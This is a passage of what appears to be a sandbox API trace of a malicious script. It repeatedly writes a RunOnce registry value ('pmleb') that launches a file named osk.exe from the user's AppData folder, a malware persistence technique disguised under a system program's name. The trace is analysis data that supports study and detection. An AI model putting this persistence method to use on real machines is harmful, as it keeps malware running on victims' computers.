pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.957] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1c [0080.957] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.957] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.957] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.957] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.957] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.957] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.957] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.958] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.958] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.958] RegCloseKey (hKey=0x280) returned 0x0 [0080.958] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.958] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.958] SetTimer (hWnd=0x20280, nIDEvent=0x2098, uElapse=0xa, lpTimerFunc=0x0) returned 0x2098 [0080.958] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.970] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.970] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.970] KillTimer (hWnd=0x20280, uIDEvent=0x2098) returned 1 [0080.970] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.970] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.970] IUnknown:Release (This=0x787518) returned 0x1 [0080.970] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.970] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.970] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.971] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.971] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1d [0080.971] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.971] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1e [0080.971] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.972] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1d [0080.972] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.972] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.972] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.972] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.972] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.972] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.972] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.972] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.973] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.973] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.973] RegCloseKey (hKey=0x280) returned 0x0 [0080.973] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.973] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.973] SetTimer (hWnd=0x20280, nIDEvent=0x2099, uElapse=0xa, lpTimerFunc=0x0) returned 0x2099 [0080.973] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.048] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.048] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.049] KillTimer (hWnd=0x20280, uIDEvent=0x2099) returned 1 [0081.049] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.049] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.049] IUnknown:Release (This=0x787518) returned 0x1 [0081.049] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.049] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.049] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.050] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.050] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1e [0081.050] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.050] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1f [0081.050] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.051] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1e [0081.051] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.051] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.051] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.051] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.051] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.051] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.052] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.052] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.052] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.052] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.052] RegCloseKey (hKey=0x280) returned 0x0 [0081.052] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.052] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.052] SetTimer (hWnd=0x20280, nIDEvent=0x209a, uElapse=0xa, lpTimerFunc=0x0) returned 0x209a [0081.053] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.063] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.063] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.063] KillTimer (hWnd=0x20280, uIDEvent=0x209a) returned 1 [0081.063] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.064] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.064] IUnknown:Release (This=0x787518) returned 0x1 [0081.064] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.064] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.064] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.064] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.064] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.064] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.064] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.064] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.064] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.065] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1f [0081.065] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.065] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x20 [0081.065] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, 